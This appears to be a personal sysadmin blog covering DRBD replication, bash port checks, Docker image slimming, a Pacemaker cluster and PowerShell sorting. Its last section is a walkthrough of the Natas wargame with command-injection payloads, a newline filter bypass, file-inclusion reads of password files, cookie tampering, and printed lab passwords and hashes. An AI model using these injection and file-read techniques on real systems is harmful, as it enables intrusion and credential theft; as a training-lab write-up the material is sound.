DRBD (without clustering)

Do you need transparent, real-time replication of block devices, without specialty hardware and without paying anything?

If your answer is YES, DRBD is your solution. DRBD is a distributed replicated storage system for the Linux platform. It is implemented as a kernel driver, several userspace management applications, and some shell scripts. DRBD is traditionally used in high-availability (HA) clusters.

In this post, I am going to create HA cluster block storage. Switch-over will be handled manually, but in the next post I will add cluster software. I have two Debian systems for this lab, as depicted in the Figure-1 sample architecture.

Figure-1 Sample HA Block Storage

Reference: https://www.ibm.com/developerworks/jp/linux/library/l-drbd/index.html

Installing DRBD packages:

Install drbd8-utils on each node.

root@debian1:~# apt-get install drbd8-utils 

Add the hostnames to the /etc/hosts file on each node.

192.168.122.70 debian1
192.168.122.71 debian2

Creating a file system:

Instead of adding disk storage, we create a file on each node and attach it to a loop device to use as backing storage. (Note that loop-device mappings created with losetup do not persist across reboots.)

root@debian1:~# mkdir /replicated
root@debian1:~# dd if=/dev/zero of=drbd.img bs=1024K count=512
root@debian2:~# mkdir /replicated
root@debian2:~# dd if=/dev/zero of=drbd.img bs=1024K count=512
root@debian1:~# losetup /dev/loop0 /root/drbd.img
root@debian2:~# losetup /dev/loop0 /root/drbd.img

Configuring DRBD:

Add the configuration below on each node.

root@debian1:~# cat /etc/drbd.d/replicated.res
resource replicated {
        protocol C;
        on debian1 {
                device /dev/drbd0;
                disk /dev/loop0;
                address 192.168.122.70:7788;
                meta-disk internal;
        }
        on debian2 {
                device /dev/drbd0;
                disk /dev/loop0;
                address 192.168.122.71:7788;
                meta-disk internal;
        }
}


Initializing metadata storage (on each node):

root@debian1:~# drbdadm create-md replicated
initializing activity log
NOT initializing bitmap
Writing meta data...
New drbd meta data block successfully created.
root@debian1:~# 

Make sure that the drbd service is running on both nodes.

root@debian1:~# systemctl status drbd
● drbd.service - LSB: Control DRBD resources.
   Loaded: loaded (/etc/init.d/drbd; generated; vendor preset: enabled)
   Active: active (exited) since Fri 2019-02-01 15:32:34 +04; 6min ago
     Docs: man:systemd-sysv-generator(8)
  Process: 1399 ExecStop=/etc/init.d/drbd stop (code=exited, status=0/SUCCESS)
  Process: 1420 ExecStart=/etc/init.d/drbd start (code=exited, status=0/SUCCESS)
    Tasks: 0 (limit: 4915)
   CGroup: /system.slice/drbd.service

root@debian2:~# lsblk 
NAME              MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0               7:0    0  512M  0 loop 
└─drbd0           147:0    0  512M  1 disk 
sr0                11:0    1 1024M  0 rom  
vda               254:0    0   10G  0 disk 
└─vda1            254:1    0   10G  0 part 
  ├─vgroot-lvroot 253:0    0  7.1G  0 lvm  /
  └─vgroot-lvswap 253:1    0  976M  0 lvm  [SWAP]

DRBD allows only one node at a time to act as the primary node, where reads and writes can be performed. We will first promote node 1 to primary.

root@debian1:~# drbdadm primary replicated --force

root@debian1:~# cat /proc/drbd 
version: 8.4.7 (api:1/proto:86-101)
srcversion: AC50E9301653907249B740E
0: cs:SyncSource ro:Primary/Secondary ds:UpToDate/Inconsistent C r-----
ns:516616 nr:0 dw:0 dr:516616 al:8 bm:0 lo:0 pe:0 ua:0 ap:0 ep:1 wo:f oos:7620
[==================>.] sync'ed: 99.3% (7620/524236)K
finish: 0:00:00 speed: 20,968 (13,960) K/sec
root@debian1:~# cat /proc/drbd
version: 8.4.7 (api:1/proto:86-101)
srcversion: AC50E9301653907249B740E
0: cs:SyncSource ro:Primary/Secondary ds:UpToDate/Inconsistent C r-----
ns:524236 nr:0 dw:0 dr:524236 al:8 bm:0 lo:0 pe:0 ua:0 ap:0 ep:1 wo:f oos:0
[===================>] sync'ed:100.0% (0/524236)K
finish: 0:00:00 speed: 20,300 (13,792) K/sec

Initializing the Filesystem:

root@debian1:~# mkfs.ext4 /dev/drbd0 
root@debian1:~# mount /dev/drbd0 /replicated/

Do not forget: format the DRBD device (in this case /dev/drbd0) on the first node only. Do not run mkfs.ext4 on the second node; DRBD replicates the filesystem to it.

Switching over to the Second Node:

#On first node:
root@debian1:~# umount /replicated
root@debian1:~# drbdadm secondary replicated
#On second node:
root@debian2:~# drbdadm primary replicated
root@debian2:~# mount /dev/drbd0 /replicated

Switching back to the First Node:

#On second node:
root@debian2:~# umount /replicated
root@debian2:~# drbdadm secondary replicated
#On first node:
root@debian1:~# drbdadm primary replicated
root@debian1:~# mount /dev/drbd0 /replicated


Checking Connection without Telnet

Some minimal Linux distributions ship without a telnet client or similar utilities such as nc or ncat unless you install them. Much of the time we need to troubleshoot whether a server/service is reachable. Do not worry: Bash itself provides a mechanism, via its /dev/tcp and /dev/udp pseudo-device redirections, without installing any of the above utilities. Take a look at the examples below and adapt them to your case.

Checking TCP connection:

root@debian2:# echo > /dev/tcp/8.8.8.8/53 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN
root@debian2:~# echo > /dev/tcp/google.com/80 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN
root@debian2:~# echo > /dev/tcp/google.com/443 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN
#The attempt gets stuck on this port, so I have to send SIGINT (Ctrl-C). Wrapping the redirect in timeout, e.g. timeout 3 bash -c 'echo > /dev/tcp/google.com/123', avoids the wait.
root@debian2:~# echo > /dev/tcp/google.com/123 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
^C-su: connect: Network is unreachable


Checking UDP Connection:

root@debian2:~# echo > /dev/udp/0.pool.ntp.org/123 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN

Keep in mind that UDP is connectionless: the write only fails if an ICMP port-unreachable response comes back, so this test can report OPEN for filtered or silently dropped ports.

Minimizing Docker Images with Multistage

When you build your own Docker image from a Dockerfile, each instruction creates a new layer on top of the base image, together with all of its dependencies, so even a very tiny application can produce an image around 1 GiB in size. Such large images are undesirable in production for the reasons below.

  • Large images take longer to download
  • Large images take up more disk space
  • Large images contain unnecessary components

How to Reduce Image Size?

The answer is multi-stage builds. Multi-stage builds enable you to create smaller container images with better caching and a smaller security footprint. In this post, I will show you how to minimize your Docker image step by step. For this experiment, I wrote a very simple Go web application.

Let's create a web application named main.go:

package main

import (
    "fmt"
    "log"
    "net/http"
)

func handler(w http.ResponseWriter, r *http.Request) {
    fmt.Fprintf(w, "Hi there, I love %s!", r.URL.Path[1:])
    log.Printf("connection from:%s",r.RemoteAddr)
}

func main() {
    http.HandleFunc("/", handler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

Creating a Dockerfile.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
RUN go build -o main .
EXPOSE 8080
CMD ["/webapps/app/main"]

Building docker image

tesla@otuken:~/DockerTraining/SimpleHello$ sudo docker build -t gokay/goweb:1 .

Figure-1 Image Size 317MB

As you can see in Figure-1, the image size for that simple application is 317 MB.

Multi-Stage Build:

In this section, I will show how to reduce the Docker image size with a multi-stage build. The only thing we need to do is add a few lines to our Dockerfile.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
RUN go build -o main .


FROM alpine
WORKDIR /app
ADD . /app
COPY --from=builder /webapps/app/main /app
EXPOSE 8080
CMD ["/app/main"]

tesla@otuken:~/DockerTraining/SimpleHello$ sudo docker build -t gokay/goweb:1 .

After building our new image with the new Dockerfile, the image size is considerably reduced.

Figure-2 Image size 11MB

As you can see, the Docker image size is now 11 MB.

If this size is enough for you, you can skip the rest of the post. Since our application is written in Go, we can shave the image down a little more by disabling cgo and producing a statically linked binary, as below.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags '-extldflags "-static"' -o main .

FROM alpine
WORKDIR /app
ADD . /app
COPY --from=builder /webapps/app/main /app
EXPOSE 8080
CMD ["/app/main"]

Figure-3 Image size 10.9 MB

Reducing Further?

You can use the scratch image, which is the most minimal base image available. But I would recommend Alpine, as it is a small, security-oriented Linux distribution.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
#RUN go build -o main .
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags '-extldflags "-static"' -o main .
#EXPOSE 8080
#CMD ["/webapps/app/main"]


FROM scratch
WORKDIR /app
ADD . /app
COPY --from=builder /webapps/app/main /app
EXPOSE 8080
CMD ["/app/main"]

tesla@otuken:~/DockerTraining/SimpleHello$ sudo docker build -t gokay/goweb:1 .

Building RHEL7 Cluster Part-I

Hello Folks,

It has been a long time since I last posted. This series covers clustering with RHEL7, which uses Pacemaker as its high-availability cluster resource manager.

In this post, a two-node cluster will be used. Each node has been configured to resolve the hostnames to IP addresses, and to sync its time from external NTP servers. The setup is depicted in Figure-1.

Nodes:

pck1 – 192.168.122.22

pck2 – 192.168.122.23

The ntpd daemon is used instead of chronyd.

Figure-1 Two-Node Cluster with Pacemaker

Installing Necessary Packages:

On both nodes;

[root@pcmk-1 ~]# yum update -y
[root@pcmk-1 ~]# yum install -y pacemaker pcs psmisc policycoreutils-python

Configuring Firewall:

On both nodes;

[root@pcmk-1 ~]# firewall-cmd --permanent --add-service=high-availability
[root@pcmk-1 ~]# firewall-cmd --reload

Disabling Selinux:

On both nodes;

[root@pcmk-1 ~]# setenforce 0
[root@pcmk-1 ~]# sed -i.bak "s/SELINUX=enforcing/SELINUX=permissive/g" /etc/selinux/config

Starting and Enabling the Cluster Service:

On both nodes;

[root@pck1 ~]# systemctl enable pcsd.service
Created symlink from /etc/systemd/system/multi-user.target.wants/pcsd.service to /usr/lib/systemd/system/pcsd.service.
[root@pck1 ~]# systemctl start pcsd.service 

Configuring Cluster:

On both nodes, set a password for the user hacluster.

[root@pck1 ~]# passwd hacluster

On either node, authenticate the nodes.

[root@pck1 ~]# pcs cluster auth pck1 pck2
Username: hacluster
Password: 
pck2: Authorized
pck1: Authorized

Naming the Cluster:

I named the cluster LATAM_GW.

[root@pck1 ~]# pcs cluster setup LATAM_GW pck1 pck2
Error: A cluster name (--name <name>) is required to setup a cluster
[root@pck1 ~]# pcs cluster setup --name LATAM_GW pck1 pck2
Destroying cluster on nodes: pck1, pck2...
pck1: Stopping Cluster (pacemaker)...
pck2: Stopping Cluster (pacemaker)...
pck2: Successfully destroyed cluster
pck1: Successfully destroyed cluster

Sending 'pacemaker_remote authkey' to 'pck1', 'pck2'
pck1: successful distribution of the file 'pacemaker_remote authkey'
pck2: successful distribution of the file 'pacemaker_remote authkey'
Sending cluster config files to the nodes...
pck1: Succeeded
pck2: Succeeded

Synchronizing pcsd certificates on nodes pck1, pck2...
pck2: Success
pck1: Success
Restarting pcsd on the nodes in order to reload the certificates...
pck2: Success
pck1: Success
[root@pck1 ~]#

Starting the Cluster:

On either node.

[root@pck1 ~]# pcs cluster start --all
pck1: Starting Cluster...
pck2: Starting Cluster...

You can also start a specific node instead of all nodes in the cluster.

[root@pck1 ~]# pcs cluster start pck1
pck1: Starting Cluster...

Viewing the version of cluster software:

[root@pck1 ~]# pacemakerd --features
Pacemaker 1.1.18-11.el7_5.3 (Build: 2b07d5c5a9)
 Supporting v3.0.14:  generated-manpages agent-manpages ncurses libqb-logging libqb-ipc systemd nagios  corosync-native atomic-attrd acls
[root@pck1 ~]# 

Checking the Current Cluster Configuration:

The cluster configuration is stored in XML format. You can view the current configuration with “pcs cluster cib”.

[root@pck2 ~]# pcs cluster cib 
<cib crm_feature_set="3.0.14" validate-with="pacemaker-2.10" epoch="5" num_updates="4" admin_epoch="0" cib-last-written="Sat Dec  1 14:55:56 2018" update-origin="pck2" update-client="crmd" update-user="hacluster" have-quorum="1" dc-uuid="2">
  <configuration>
    <crm_config>
      <cluster_property_set id="cib-bootstrap-options">
        <nvpair id="cib-bootstrap-options-have-watchdog" name="have-watchdog" value="false"/>
        <nvpair id="cib-bootstrap-options-dc-version" name="dc-version" value="1.1.18-11.el7_5.3-2b07d5c5a9"/>
        <nvpair id="cib-bootstrap-options-cluster-infrastructure" name="cluster-infrastructure" value="corosync"/>
        <nvpair id="cib-bootstrap-options-cluster-name" name="cluster-name" value="LATAM_GW"/>
      </cluster_property_set>
    </crm_config>
    <nodes>
      <node id="1" uname="pck1"/>
      <node id="2" uname="pck2"/>
    </nodes>
    <resources/>
    <constraints/>
  </configuration>
  <status>
    <node_state id="1" uname="pck1" in_ccm="true" crmd="online" crm-debug-origin="do_state_transition" join="member" expected="member">
      <lrm id="1">
        <lrm_resources/>
      </lrm>
    </node_state>
    <node_state id="2" uname="pck2" in_ccm="true" crmd="online" crm-debug-origin="do_state_transition" join="member" expected="member">
      <lrm id="2">
        <lrm_resources/>
      </lrm>
    </node_state>
  </status>
</cib>

Adding Resources to the Cluster:

In this post, a highly available (active-passive) Apache web server will be built. The first resource we need to create is the ClusterIP, in other words a floating IP. A floating IP address is used to support failover in a high-availability cluster: the cluster is configured so that only the active member “owns” or responds to that IP address at any given time.

On either node.

[root@pck1 ~]# pcs resource create ClusterIP ocf:heartbeat:IPaddr2 \
    ip=192.168.122.24 cidr_netmask=32 op monitor interval=30s

Configuring Apache for the Active-Passive cluster(HA)

On both nodes, install httpd and wget. wget is required by the resource agent to check the health of the node.

[root@pck1 ~]# yum install -y httpd wget

Create a webpage on both nodes like below.

On first node:

Create index.html in the /var/www/html

 <html>
 <body>LATAMWEBGW running on - pck1.localdomain</body>
 </html>

On second node.

Create index.html in the /var/www/html

<html>
 <body>LATAMWEBGW running on - pck2.localdomain</body>
 </html>

Configure apache for server-status:

This page will be requested by the cluster resource agent to check the health of the nodes.

On the first node, create the configuration in /etc/httpd/conf.d/status.conf:

<Location /server-status>
    SetHandler server-status
    Require all denied
    Require ip 127.0.0.1
    Require ip ::1
    Require ip 192.168.122.22
</Location>

On the second node, create the configuration in /etc/httpd/conf.d/status.conf:

<Location /server-status>
    SetHandler server-status
    Require all denied
    Require ip 127.0.0.1
    Require ip ::1
    Require ip 192.168.122.23
</Location>

Creating the Apache Resource:

On either node only.

pcs resource create LATAMWEBGW ocf:heartbeat:apache  \
      configfile=/etc/httpd/conf/httpd.conf \
      statusurl="http://localhost/server-status" \
      op monitor interval=1min

As you may know, we now have two resources: ClusterIP and LATAMWEBGW. If you do nothing special, the cluster manager balances the two resources by running them on different nodes, which is not what we want, because these two resources depend on each other. We need to add constraints to solve this problem.

Creating colocation constraint:

A colocation constraint tells the cluster manager that the location of one resource depends on the location of another resource.

On either node

pcs constraint colocation add LATAMWEBGW with ClusterIP INFINITY

By issuing the command above, we told the cluster manager that the LATAMWEBGW resource must run on the same node as the ClusterIP resource.

Latest status of our cluster:

[root@pck1 conf.d]# pcs status
Cluster name: LATAM_GW
Stack: corosync
Current DC: pck1 (version 1.1.18-11.el7_5.3-2b07d5c5a9) - partition with quorum
Last updated: Sun Dec  2 13:43:46 2018
Last change: Sun Dec  2 13:43:42 2018 by root via cibadmin on pck1

2 nodes configured
3 resources configured

Online: [ pck1 pck2 ]

Full list of resources:

 virsh-fencing	(stonith:fence_virsh):	Stopped
 ClusterIP	(ocf::heartbeat:IPaddr2):	Started pck1
 LATAMWEBGW	(ocf::heartbeat:apache):	Started pck1

Creating Order Constraint:

We may still have an issue when sending requests to our web server. Besides the colocation constraint, we also need to tell the cluster software the order in which the resources should be started. This is called an order constraint.

[root@pck1 conf.d]# pcs constraint order ClusterIP then LATAMWEBGW
Adding ClusterIP LATAMWEBGW (kind: Mandatory) (Options: first-action=start then-action=start)
[root@pck1 conf.d]#

By issuing the command above, we are telling the cluster manager which resource must start first. After configuring the constraints, we can test whether our web server handles requests properly.

tesla@otuken:~$ curl http://latamwebgw
 <html>
 <body>My Test Site - pck1.localdomain</body>
 </html>

Relocating the Resource to Another Node:

Sometimes we need to relocate resources to the other node for maintenance or upkeep.

[root@pck2 ~]# pcs status
Cluster name: LATAM_GW
Stack: corosync
Current DC: pck1 (version 1.1.18-11.el7_5.3-2b07d5c5a9) - partition with quorum
Last updated: Wed Dec  5 23:26:49 2018
Last change: Mon Dec  3 09:27:47 2018 by root via crm_resource on pck1

2 nodes configured
3 resources configured

Online: [ pck1 pck2 ]

Full list of resources:

 virsh-fencing	(stonith:fence_virsh):	Stopped
 ClusterIP	(ocf::heartbeat:IPaddr2):	Started pck1
 LATAMWEBGW	(ocf::heartbeat:apache):	Started pck1

Failed Actions:
* virsh-fencing_start_0 on pck1 'unknown error' (1): call=14, status=Error, exitreason='',
    last-rc-change='Wed Dec  5 21:26:32 2018', queued=0ms, exec=1404ms
* virsh-fencing_start_0 on pck2 'unknown error' (1): call=14, status=Error, exitreason='',
    last-rc-change='Wed Dec  5 21:26:36 2018', queued=0ms, exec=1398ms


Daemon Status:
  corosync: active/disabled
  pacemaker: active/disabled
  pcsd: active/enabled

As you can see, the resources are currently running on pck1, the first node. Let’s relocate them to pck2, the second node.

[root@pck2 ~]# pcs resource move LATAMWEBGW pck2
[root@pck2 ~]# pcs status
Cluster name: LATAM_GW
Stack: corosync
Current DC: pck1 (version 1.1.18-11.el7_5.3-2b07d5c5a9) - partition with quorum
Last updated: Wed Dec  5 23:34:10 2018
Last change: Wed Dec  5 23:33:42 2018 by root via crm_resource on pck2

2 nodes configured
3 resources configured

Online: [ pck1 pck2 ]

Full list of resources:

 virsh-fencing	(stonith:fence_virsh):	Stopped
 ClusterIP	(ocf::heartbeat:IPaddr2):	Started pck2
 LATAMWEBGW	(ocf::heartbeat:apache):	Started pck2

As you can see, the LATAMWEBGW resource is now running on pck2, the second node.

tesla@otuken:~$ curl http://latamwebgw
 <html>
 <body>My Test Site - pck2.localdomain</body>
 </html>

This is the end of the first part of the RHEL7 clustering series. We have not yet configured fencing, which is a crucial part of clustering. In the next post we will configure fencing, stickiness, and other cluster settings.

Happy Clustering 🙂

Sorting by Specific Column in PowerShell

Hello Folks,

I needed a PowerShell script that sorts data by a specific column. I wanted to share it on my blog, as I did not see many examples on the Internet.

Let’s say you have data as below and you want to sort it by a specific column. In this example I sort the data by Elapsed Time.

Fields in the sample data are delimited by multiple spaces (in regex terms, \s+).

The fields are: Batch Name, Status, Stage, Batch Date, Start Time, End Time, Elapsed Time, Avg. Elapsed Time.

BNK/TEST001 0 A100-Application 20140325 20:01:38 20:01:38 0 0.2
BNK/TEST002 0 R050-Reporting 20140325 21:23:50 21:23:51 1 0.3
BNK/TEST003 0 D110-Start-of-Day 20140325 00:17:34 00:17:34 0 0.9
BNK/TEST004 0 D110-Start-of-Day 20140325 00:17:33 00:17:33 0 0.5
BNK/TEST005 0 S920-System-Wide 20140325 21:09:41 21:09:41 0 0.0
BNK/TEST006 0 S920-System-Wide 20140325 21:18:46 21:18:47 1 0.4
BNK/TEST007 0 S920-System-Wide 20140325 21:18:48 21:18:48 1 0.7
BNK/TEST008 0 S920-System-Wide 20140325 21:18:48 21:18:48 0 0.0
BNK/TEST009 0 S920-System-Wide 20140325 21:18:48 21:18:48 0 0.1
BNK/TEST010 0 S920-System-Wide 20140325 21:10:38 21:18:46 544 508.3

Sorting Script

Get-Content sample_data.txt | ForEach-Object {
 $Line = $_.Trim() -Split '\s+'
 New-Object -TypeName PSCustomObject -Property @{
                batchName = $Line[0]
                #status = $Line[1]
                stage = $Line[2]
                batchDate = $Line[3]
                startTime = $Line[4]
                endTime = $Line[5]
                elapsedTime = [double]$Line[6]
                avgElapsedtime = [double]$Line[7]
  }

} | Sort-Object elapsedTime -Descending | Format-Table -Property batchName,stage,batchDate,startTime,endTime,elapsedTime  -AutoSize | Out-String -Width 4096 | Out-file results.txt -Encoding default

Results

batchName   stage             batchDate startTime endTime  elapsedTime
---------   -----             --------- --------- -------  -----------
BNK/TEST010 S920-System-Wide  20140325  21:10:38  21:18:46         544
BNK/TEST007 S920-System-Wide  20140325  21:18:48  21:18:48           1
BNK/TEST006 S920-System-Wide  20140325  21:18:46  21:18:47           1
BNK/TEST002 R050-Reporting    20140325  21:23:50  21:23:51           1
BNK/TEST009 S920-System-Wide  20140325  21:18:48  21:18:48           0
BNK/TEST001 A100-Application  20140325  20:01:38  20:01:38           0
BNK/TEST008 S920-System-Wide  20140325  21:18:48  21:18:48           0
BNK/TEST003 D110-Start-of-Day 20140325  00:17:34  00:17:34           0
BNK/TEST004 D110-Start-of-Day 20140325  00:17:33  00:17:33           0
BNK/TEST005 S920-System-Wide  20140325  21:09:41  21:09:41           0

Happy Scripting 🙂

Solutions of NATAS 1-15

Hello Folks,

In this post, I will share with you the solutions of the Natas challenges from one to fifteen. I strongly recommend not looking at a solution before attempting the challenge yourself.

Natas0:

Username and password have been already provided for Natas0.

URL: http://natas0.natas.labs.overthewire.org

natas0/natas0

Solution:

Log in to the page with the credentials natas0/natas0.

On Chrome Browser right-click and “View page source”

Password for natas1 is : gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1:

URL: http://natas1.natas.labs.overthewire.org/

Solution:

Log in to the page with the credentials that you got from natas0.

In this challenge right-clicking is disabled; instead, press the F12 function key to open the web developer tools and select the Elements tab.

Password for natas2 is : ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Natas2:

URL: http://natas2.natas.labs.overthewire.org

Solution:

Log in to the page with the credentials that you got from natas1.

On Chrome Browser right-click and “View page source”

It is not obvious at first, but we have a hint in the tag <img src="files/pixel.png">

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Let’s make a request for the URL http://natas2.natas.labs.overthewire.org/files/

You can see the file users.txt, which holds a number of users’ credentials.

Password for natas3 is : sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3:

URL: http://natas3.natas.labs.overthewire.org

For this challenge, we need a basic understanding of robots.txt, which implements the Robots Exclusion Protocol: it indicates whether certain user agents (web-crawling software) may crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents.

Solution:

Log in to the page with the credentials that you got from natas2 and “View Page Source” in Google Chrome.

Let’s make request to URL http://natas3.natas.labs.overthewire.org/robots.txt
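The response contains a short set of crawl rules along these lines (paraphrased; check the live response for the exact content):

```
User-agent: *
Disallow: /s3cr3t
```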

As the introduction indicated, it tells all user agents (all crawlers) not to access or index the contents of the folder s3cr3t. If we make another request, for the URL http://natas3.natas.labs.overthewire.org/s3cr3t/, we see users.txt.

Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4:

URL: http://natas4.natas.labs.overthewire.org

To solve this challenge you need a basic understanding of the de-facto standard HTTP request headers. Here, the key is the Referer header.

Solution:

Referer is an HTTP header field that identifies the address of the webpage (i.e. the URI or IRI) that linked to the resource being requested. By checking the referrer, the new webpage can see where the request originated.(Wikipedia)

curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/"  -u  natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

Password for natas5 is : iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5:

URL: http://natas5.natas.labs.overthewire.org

When we send a web request to the web server via curl, the web server returns a Set-Cookie header to the user agent, and with every subsequent request the user agent sends all previously stored cookies back to the server in the Cookie: header.

curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
< 

Solution:

There is no single obvious answer to this challenge. Guided by the Set-Cookie: loggedin=0 header above, I guessed and modified the cookie by setting Cookie: loggedin=1.

curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
< 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact

Password for the natas6 is : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6:

URL: http://natas6.natas.labs.overthewire.org

When we check the source code, we see that it compares the value of $secret with the value of the input element. If both values are equal, the password for natas7 is printed.

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

Solution: 

The include statement includes and evaluates the specified file (PHP manual). Let’s try to access the includes/secret.inc file by making a web request to the URL http://natas6.natas.labs.overthewire.org/includes/secret.inc

As you can see, the value of the $secret variable is FOEIUWGHFEEUHOFUOIU. Put this value into the input form and submit it.

Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7:

URL: http://natas7.natas.labs.overthewire.org

Solution:

Web pages are rendered according to the value of $_REQUEST['page']. As an example, http://natas7.natas.labs.overthewire.org/index.php?page=about renders the about page.

What if we set the page value to /etc/natas_webpass/natas8? Our URL becomes http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8:

URL: http://natas8.natas.labs.overthewire.org

We need to do some simple reverse engineering to solve this challenge. The key is the function encodeSecret().

We must find an input value for which the function yields 3d3d516343746d4d6d6c315669563362.

Solution:

You can use https://repl.it/repls/SoftElegantPublishers as a PHP sandbox.

<?php

echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));

//oubWYf2kBq
?>
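As a cross-check, a quick Python sketch runs the decode chain above in the forward direction (base64-encode, reverse, hex-encode) and reproduces the target hex string:

```python
import base64
import binascii

# Forward direction of the decode chain above: base64 -> reverse -> hex.
value = b"oubWYf2kBq"
encoded = binascii.hexlify(base64.b64encode(value)[::-1]).decode()
print(encoded)  # 3d3d516343746d4d6d6c315669563362
```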


If you put the value oubWYf2kBq into the secret input, you will get the password for natas9.

Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9:

URL: http://natas9.natas.labs.overthewire.org

Solution:

We can run multiple commands by separating them with a semicolon (;):

ls;cat /etc/natas_webpass/natas10

Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10:

URL: http://natas10.natas.labs.overthewire.org

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

Solution: 

If you check the snippet of code above, certain special characters (; | &) are rejected by the preg_match() PHP function. We need to bypass this check somehow.

Solution1: .* cat /etc/natas_webpass/natas11

Solution 2: Using URL encoding (a %0A-encoded newline) to get past the preg_match() filter.

http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
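For the record, the %0A in the URL above is just a URL-encoded newline: inside the string passed to passthru(), a newline acts as a shell command separator, and the [;|&] blacklist does not catch it. A small sketch of building such a payload with Python's urllib (the payload mirrors the request above):

```python
from urllib.parse import quote

# A newline separates shell commands but is not in the [;|&] blacklist.
payload = "pass\n cat /etc/natas_webpass/natas11"
print(quote(payload))  # pass%0A%20cat%20/etc/natas_webpass/natas11
```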

